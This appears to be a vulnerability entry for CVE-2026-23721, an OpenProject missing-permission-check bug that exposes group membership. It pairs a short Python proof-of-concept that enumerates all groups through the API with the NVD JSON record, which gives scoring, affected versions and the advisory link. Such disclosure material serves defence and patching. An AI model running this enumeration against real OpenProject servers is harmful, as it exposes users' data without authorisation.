CVE-2026-23721

import requests target = "http://target-openproject.com" api_token = "user_api_token_with_view_members_permission" headers = {"Authorization": f"Bearer {api_token}"} # 枚举所有组 groups_response = requests.get(f"{target}/api/v3/groups", headers=headers) if groups_response.status_code == 200: groups = groups_response.json() print(f"发现 {len(groups)} 个组") for group in groups: print(f"组: {group['name']}, ID: {group['id']}")

{"cve": {"id": "CVE-2026-23721", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:05.730", "lastModified": "2026-02-02T20:44:39.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. When using groups in OpenProject to manage users, the group members should only be visible to users that have the View Members permission in any project that the group is also a member of. Prior to versions 17.0.1 and 16.6.5, due to a failed permission check, if a user had the View Members permission in any project, they could enumerate all Groups and view which other users are part of the group. The issue has been fixed in OpenProject 17.0.1 and 16.6.5. No known workarounds are available."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Cuando se utilizan grupos en OpenProject para gestionar usuarios, los miembros del grupo solo deberían ser visibles para los usuarios que tienen el permiso 'Ver miembros' en cualquier proyecto del que el grupo también sea miembro. Antes de las versiones 17.0.1 y 16.6.5, debido a una comprobación de permisos fallida, si un usuario tenía el permiso 'Ver miembros' en cualquier proyecto, podía enumerar todos los Grupos y ver qué otros usuarios formaban parte del grupo. El problema ha sido solucionado en OpenProject 17.0.1 y 16.6.5. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.5", "matchCriteriaId": "4C6FE059-AB36-4883-AE55-2E65FDE51BD2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:17.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "78FA3834-A1AB-4489-AE2A-2C7FAE9B619F"}]}]}], "references": [{"url": "https://github.com/opf/openproject/security/advisories/GHSA-vj77-wrc2-5h5h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}